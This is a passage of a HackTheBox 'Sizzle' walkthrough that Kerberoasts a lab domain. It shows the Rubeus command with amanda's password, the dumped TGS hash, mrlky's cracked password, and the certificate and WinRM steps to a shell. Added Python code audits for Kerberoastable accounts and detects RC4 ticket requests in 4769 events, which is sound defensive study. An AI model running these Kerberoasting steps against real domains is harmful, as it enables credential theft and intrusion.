PS htb\amanda@SIZZLE Users> netstat -ap tcp
Enter PEM pass phrase:
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:21 sizzle:0 LISTENING
TCP 0.0.0.0:80 sizzle:0 LISTENING
TCP 0.0.0.0:88 sizzle:0 LISTENING
TCP 0.0.0.0:135 sizzle:0 LISTENING
TCP 0.0.0.0:389 sizzle:0 LISTENING
Port 88 (Kerberos) is listening locally, but it did not show up in my nmap scan from outside; it must be filtered by a firewall or something similar.
We can't reach port 88 directly from our machine, so I can either set up port forwarding or run rubeus.exe on the target itself.
I'll transfer rubeus.exe to the target and execute it there.
PS htb\amanda@SIZZLE temp> . ./rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
Enter PEM pass phrase:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : HTB.LOCAL
[*] Searching path 'LDAP://sizzle.HTB.LOCAL/DC=HTB,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : mrlky
[*] DistinguishedName : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
[*] ServicePrincipalName : http/sizzle
[*] PwdLastSet : 7/10/2018 2:08:09 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$C778EF9C8E3ED29E0BF9654A9D99
A04D$D3B85BE0592E195034F721E93B0E929390592D70CA3575D31A163037F223CB0AA068659A699
D316A62B24C52411C88D09BDD68C151B7DF4F6BEE0DEC6EB62CF35D5B102226037EA5E6CF361F677
69E3D16ACF34235D585250A169F8F54E4B3BC2F7275028531AAE00DDA7DA13EA804368A799333FFC
9F55115A6429FCCB838D52DE0D9316B160F677369D6EF05B79BD05C22D537B60202A3F2F0C60013A
B9A1E9BE3FBEA4AF86A1F2313EFF8C647B2021B09F2EDB4A3BF8597EF3FCFA92C9EA1AE9278CB716
9365019B609B3BBD485A7E0345FE60A726837DE08D8327749E85BE9EBC20A50815EC0339BE7DA260
E0919F3E190FDFB57074F13E5B5EBAB9901B79C43E2B0DBF7CA7DA4490A3E3254B2FE0EB145A701A
B464B97A6984F252BE28C843CCAC3932C9DC8B1DE96B646C99064B4635F9BBE00223B1CF061BE3D2
310AD575515BA2A2DA9AFCE0BF17DED50C4EBA514AFC84777DF8AB7B80A647D56FC4A822660BE991
5A87F3ADA80CD180D0C3EE1249E8A79169F3C3DC0EE346CFD446CCAE5625BDC903BF10F9D460D28C
153968B6ED3E7C6F493D9FFFD41AB03B8B4FE4FCC14132468263D4598231943AD4EF30E2A78AC65D
5E645FEE4E4E2711D0F811014B319AD83A4E185147AFF953CEA8167D01181EB386755B48AED13ADC
53106BA32B83E216C11A0111B475C72E4C0307554C68336C0B07A039E503CC0534E35685A2CB5001
7EDBE1F737793CC930B0A9621CF33775FCE9D21FC5CEADCF08BA15796D79EC1B93E5214EBFE6594C
6BBBA8FB269C0BA6E0BB730343F48C40EB0493C686018E41D24A3E2ACE4DB1CEC5CE76E8B196ACAE
8407D1431361FC1BA407D08A952CC15039F116D5CA4CF90A0001BBF21A19B6371853F2FA6AD6AB9D
E8FD61E00159CA960411C9E70908B4190B79DDCE1A28D375C599EB123E8046EA523F7552E109C870
74556646C7A315C2ACA9F40EC7EA4C3B773BA7888F8F475362EDAEEB3E2FAAE1D590E9CF0B0938EF
973D28974287DC1946E39B843821B08D233BF4AA44DCC880DDD573891BA4AB9D5F0F4632ABC150DE
E427F56C2B3F81A5849A7AFCAFA85C487DF23A1900EF3F3CD6F48F4AC6AF383828B3817ABDC32E94
5EFDE2A704EEA28CD9D8FF2E3DB4DE697B1B82CAA9935705EF04F652EBC022B44122D6C9F30636C5
D452086FA4AAF50268C28EB46DCAA0337B8785B0AD2B63601EF44F2C64A3F8901BDA7C143009FF66
934B528C277C4984B3DF39EA2B2C9AE1BE2EE8D6AD0FBF154528F20E9F6C51BA18D916A2C87D14AC
6F34F71C1CB8D85B96666153E2941BE849D7638C2E0B0ED354568CE29B4C626381CCD4A8830ECAFD
18F18BC689E2E7AB8
I joined the wrapped hash back into a single line with vim and cracked it:
mrlky:Football#7
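As an added example (not part of this writeup and not Rubeus code), the following Python evaluates the LDAP filter Rubeus printed above against a small constructed directory, so a defender can see exactly which accounts a Kerberoast query returns and which of them still get RC4-encrypted service tickets (the RC4_HMAC_DEFAULT case shown for mrlky, where msDS-SupportedEncryptionTypes is unset). The filter parser handles only the operators this query uses (&, |, !, equality, presence and the bitwise-AND matching rule 1.2.840.113556.1.4.803); apart from the names mrlky, amanda, krbtgt and SIZZLE, every sample account and attribute value is made up.

```python
import re

# The LDAP filter Rubeus logged above, copied verbatim from its output.
RUBEUS_FILTER = ("(&(samAccountType=805306368)(servicePrincipalName=*)"
                 "(!samAccountName=krbtgt)"
                 "(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))")
BIT_AND = "1.2.840.113556.1.4.803"   # LDAP_MATCHING_RULE_BIT_AND
ITEM_RE = re.compile(r"^([A-Za-z0-9-]+)(?::([0-9.]+):)?=(.*)$")
RC4_HMAC, AES_BITS = 0x4, 0x8 | 0x10  # msDS-SupportedEncryptionTypes bits

def parse_item(text):
    """'attr=value', 'attr=*' or 'attr:OID:=value' -> (kind, attr, value)."""
    m = ITEM_RE.match(text)
    if not m or m.group(2) not in (None, BIT_AND):
        raise ValueError("unsupported filter item: " + text)
    attr, rule, value = m.group(1).lower(), m.group(2), m.group(3)
    if rule == BIT_AND:
        return ("bitand", attr, int(value))
    if value == "*":
        return ("present", attr, None)
    return ("eq", attr, value)

def parse_filter(s, pos=0):
    """Parse the parenthesised filter at s[pos]; return (tree, next_pos).
    Also accepts AD's lax '(!attr=value)' spelling that Rubeus uses."""
    if s[pos] != "(":
        raise ValueError("expected '(' at offset %d" % pos)
    pos += 1
    op = s[pos]
    if op in "&|":
        pos, children = pos + 1, []
        while s[pos] == "(":
            child, pos = parse_filter(s, pos)
            children.append(child)
        node = (op, children)
    elif op == "!" and s[pos + 1] == "(":
        child, pos = parse_filter(s, pos + 1)
        node = ("!", [child])
    elif op == "!":
        end = s.index(")", pos)
        node, pos = ("!", [parse_item(s[pos + 1:end])]), end
    else:
        end = s.index(")", pos)
        node, pos = parse_item(s[pos:end]), end
    if s[pos] != ")":
        raise ValueError("expected ')' at offset %d" % pos)
    return node, pos + 1

def evaluate(node, entry):
    """Evaluate a parsed filter against one entry (lower-case attribute names)."""
    kind = node[0]
    if kind == "&":
        return all(evaluate(c, entry) for c in node[1])
    if kind == "|":
        return any(evaluate(c, entry) for c in node[1])
    if kind == "!":
        return not evaluate(node[1][0], entry)
    _, attr, value = node
    actual = entry.get(attr)
    if actual in (None, "", []):
        return False                        # absent attribute never matches
    if kind == "present":
        return True
    if kind == "eq":
        return str(actual).lower() == value.lower()
    return (int(actual) & value) == value   # bitand: all requested bits set

def kerberoastable(entries, ldap_filter=RUBEUS_FILTER):
    """sAMAccountNames the Kerberoast query would return."""
    tree, _ = parse_filter(ldap_filter)
    return sorted(e["samaccountname"] for e in entries if evaluate(tree, e))

def etype_exposure(entries):
    """For each match, say whether its service tickets can still be RC4-encrypted."""
    names, report = set(kerberoastable(entries)), {}
    for e in entries:
        if e["samaccountname"] in names:
            etypes = e.get("msds-supportedencryptiontypes") or 0
            if etypes == 0:
                label = "RC4_HMAC_DEFAULT"  # attribute unset: the mrlky case above
            elif etypes & RC4_HMAC:
                label = "RC4 allowed"
            else:
                label = "AES only" if etypes & AES_BITS else "DES only"
            report[e["samaccountname"]] = label
    return report

# Constructed sample directory: only the account names come from the box above.
SAMPLE_DIRECTORY = [
    {"samaccountname": "mrlky", "samaccounttype": 805306368,
     "serviceprincipalname": ["http/sizzle"], "useraccountcontrol": 512},
    {"samaccountname": "amanda", "samaccounttype": 805306368,
     "useraccountcontrol": 512},                                 # no SPN
    {"samaccountname": "krbtgt", "samaccounttype": 805306368,
     "serviceprincipalname": ["kadmin/changepw"], "useraccountcontrol": 514},
    {"samaccountname": "svc_old", "samaccounttype": 805306368,   # disabled (bit 2)
     "serviceprincipalname": ["MSSQLSvc/old:1433"], "useraccountcontrol": 514},
    {"samaccountname": "svc_aes", "samaccounttype": 805306368,
     "serviceprincipalname": ["HOST/app"], "useraccountcontrol": 512,
     "msds-supportedencryptiontypes": 0x18},                     # AES only
    {"samaccountname": "SIZZLE$", "samaccounttype": 805306369,   # computer object
     "serviceprincipalname": ["HOST/sizzle"], "useraccountcontrol": 4096},
]

if __name__ == "__main__":
    for name, label in etype_exposure(SAMPLE_DIRECTORY).items():
        print(name, "->", label)
```

Against the sample, the query returns mrlky and svc_aes, but only mrlky is reported as RC4_HMAC_DEFAULT; svc_aes has the AES bits set in msDS-SupportedEncryptionTypes, which is the "AES-enabled accounts" case Rubeus mentions in its notice. Replacing SAMPLE_DIRECTORY with entries pulled over LDAP turns this into an audit of which SPN accounts still need a long random password and an AES-only encryption-type setting.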
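From the detection side, the ticket requests Rubeus made above leave Event ID 4769 (a Kerberos service ticket was requested) entries in the DC's Security log. The Python below is an added example, not code from this writeup, that runs the usual Kerberoast rule over constructed 4769 records: a successful request with TicketEncryptionType 0x17 (RC4-HMAC) for a service whose account is a user, i.e. not krbtgt and not a machine account. The one-line key=value layout, the timestamps and the source IPs are made up for the example; the field names are the real 4769 EventData names, and a real deployment would parse the event XML or query a SIEM instead.

```python
from collections import defaultdict

# Constructed sample of 4769 events, flattened to one line each:
# timestamp, event id, then EventData fields as key=value. Not a real capture.
SAMPLE_4769 = """\
2018-07-10T14:30:01Z 4769 TargetUserName=amanda@HTB.LOCAL ServiceName=SIZZLE$ TicketEncryptionType=0x12 IpAddress=::ffff:192.0.2.10 Status=0x0
2018-07-10T14:30:05Z 4769 TargetUserName=amanda@HTB.LOCAL ServiceName=mrlky TicketEncryptionType=0x17 IpAddress=::ffff:192.0.2.10 Status=0x0
2018-07-10T14:30:05Z 4769 TargetUserName=amanda@HTB.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.0.2.10 Status=0x0
2018-07-10T14:30:06Z 4769 TargetUserName=amanda@HTB.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:192.0.2.10 Status=0x7
2018-07-10T14:31:10Z 4769 TargetUserName=mrlky@HTB.LOCAL ServiceName=SIZZLE$ TicketEncryptionType=0x12 IpAddress=::ffff:192.0.2.10 Status=0x0
2018-07-10T14:31:12Z 4769 TargetUserName=svc_aes@HTB.LOCAL ServiceName=SIZZLE$ TicketEncryptionType=0x17 IpAddress=::ffff:192.0.2.20 Status=0x0
2018-07-10T14:31:20Z 4768 TargetUserName=amanda ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.0.2.10 Status=0x0
"""

ETYPE_NAMES = {"0x17": "RC4-HMAC", "0x11": "AES128-CTS-HMAC-SHA1-96",
               "0x12": "AES256-CTS-HMAC-SHA1-96"}

def parse_event(line):
    """One flattened line -> dict of its fields, or None if it is not a 4769."""
    ts, event_id, rest = line.split(" ", 2)
    if event_id != "4769":
        return None
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["Time"] = ts
    return fields

def is_roastable_request(ev):
    """True for a successful RC4 (0x17) service ticket whose service account is a
    user: not krbtgt and not a machine account (machine names end in '$')."""
    svc = ev.get("ServiceName", "")
    return (ev.get("Status") == "0x0"                      # ticket was issued
            and ev.get("TicketEncryptionType", "").lower() == "0x17"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def kerberoast_alerts(log_text):
    """Return (per-event hits, per-requester roll-up of services and source IPs)."""
    hits = []
    by_requester = defaultdict(lambda: {"services": set(), "ips": set()})
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev and is_roastable_request(ev):
            hits.append({"time": ev["Time"], "requester": ev["TargetUserName"],
                         "service": ev["ServiceName"], "ip": ev["IpAddress"],
                         "etype": ETYPE_NAMES.get(ev["TicketEncryptionType"], "?")})
            agg = by_requester[ev["TargetUserName"]]
            agg["services"].add(ev["ServiceName"])
            agg["ips"].add(ev["IpAddress"])
    return hits, dict(by_requester)

if __name__ == "__main__":
    hits, summary = kerberoast_alerts(SAMPLE_4769)
    for h in hits:
        print("%(time)s %(requester)s got %(etype)s ticket for %(service)s from %(ip)s" % h)
    for who, agg in summary.items():
        print(who, "->", len(agg["services"]), "user-account service(s) via RC4")
```

Only the amanda-to-mrlky request fires: the machine-account tickets and the krbtgt ticket are normal traffic, the 0x7 line never produced a ticket, and the 4768 is a different event. The roll-up matters on a real domain, where Rubeus requests one ticket per SPN account in a burst, so a single requester touching many user-account services with RC4 within seconds stands out; once SPN accounts are AES-only, the rule fires on almost nothing but an actual roasting attempt.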
Now, to get a shell, I need to create a certificate again, just like we did for amanda, and log in to the web server with mrlky's credentials:
openssl genrsa -aes256 -out mrlky.key 2048
openssl req -new -key mrlky.key -out mrlky.csr
Submit the CSR to the web server just like in 20-GetAmanda > Certificate.
➜ certificates ruby psRemoteMrlky.rb
Enter PEM pass phrase:
PS htb\mrlky@SIZZLE Documents> dir
Enter PEM pass phrase:
PS htb\mrlky@SIZZLE Documents> whoami
htb\mrlky
PS htb\mrlky@SIZZLE Documents>